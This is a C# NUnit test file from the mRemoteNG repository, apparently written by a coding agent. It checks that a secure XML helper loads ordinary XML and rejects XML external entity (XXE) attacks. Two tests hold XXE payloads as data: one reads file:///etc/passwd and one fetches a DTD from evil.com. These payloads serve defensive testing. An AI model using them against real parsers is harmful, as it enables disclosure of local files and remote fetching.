Learning/mRemoteNG
1
0
Fork 0
mirror of https://github.com/mRemoteNG/mRemoteNG.git synced 2026-02-17 22:11:48 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
cb7ba46be65168daad56fb2cd73599c84ae1fe74
mRemoteNG/mRemoteNGTests/Security/SecureXmlHelperTests.cs
copilot-swe-agent[bot] cb7ba46be6 Add comprehensive security tests for SecureXmlHelper 
Co-authored-by: Kvarkas <3611964+Kvarkas@users.noreply.github.com>
2025-10-07 15:24:35 +00:00

91 lines
2.8 KiB
C#
Raw Blame History

using System;
using System.Xml;
using mRemoteNG.Security;
using NUnit.Framework;
namespace mRemoteNGTests.Security
{
[TestFixture]
public class SecureXmlHelperTests
{
[Test]
public void LoadXmlFromString_LoadsValidXml()
{
string validXml = "<?xml version=\"1.0\"?><root><item>test</item></root>";
XmlDocument doc = SecureXmlHelper.LoadXmlFromString(validXml);
Assert.That(doc, Is.Not.Null);
Assert.That(doc.DocumentElement?.Name, Is.EqualTo("root"));
Assert.That(doc.SelectSingleNode("/root/item")?.InnerText, Is.EqualTo("test"));
}
[Test]
public void LoadXmlFromString_RejectsXxeAttack()
{
// This is a typical XXE attack payload
string xxeXml = @"<?xml version='1.0'?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM 'file:///etc/passwd' >]>
<root><item>&xxe;</item></root>";
// Should throw exception because DTD processing is prohibited
Assert.Throws<XmlException>(() => SecureXmlHelper.LoadXmlFromString(xxeXml));
}
[Test]
public void CreateSecureXmlDocument_HasNullXmlResolver()
{
XmlDocument doc = SecureXmlHelper.CreateSecureXmlDocument();
Assert.That(doc, Is.Not.Null);
Assert.That(doc.XmlResolver, Is.Null);
}
[Test]
public void LoadXmlFromString_RejectsExternalEntity()
{
// Another XXE variant using external entity
string externalEntityXml = @"<?xml version='1.0'?>
<!DOCTYPE foo [
<!ENTITY ext SYSTEM 'http://evil.com/malicious.dtd'>
]>
<root>&ext;</root>";
Assert.Throws<XmlException>(() => SecureXmlHelper.LoadXmlFromString(externalEntityXml));
}
[Test]
public void LoadXmlFromString_HandlesXmlWithComments()
{
string xmlWithComments = @"<?xml version='1.0'?>
<root>
<!-- This is a comment -->
<item>test</item>
</root>";
// Comments should be ignored per the secure settings
XmlDocument doc = SecureXmlHelper.LoadXmlFromString(xmlWithComments);
Assert.That(doc, Is.Not.Null);
Assert.That(doc.DocumentElement?.Name, Is.EqualTo("root"));
}
[Test]
public void LoadXmlFromString_HandlesXmlWithProcessingInstructions()
{
string xmlWithPi = @"<?xml version='1.0'?>
<?xml-stylesheet type='text/xsl' href='style.xsl'?>
<root>
<item>test</item>
</root>";
// Processing instructions should be ignored per the secure settings
XmlDocument doc = SecureXmlHelper.LoadXmlFromString(xmlWithPi);
Assert.That(doc, Is.Not.Null);
Assert.That(doc.DocumentElement?.Name, Is.EqualTo("root"));
}
}
}
Reference in New Issue View Git Blame Copy Permalink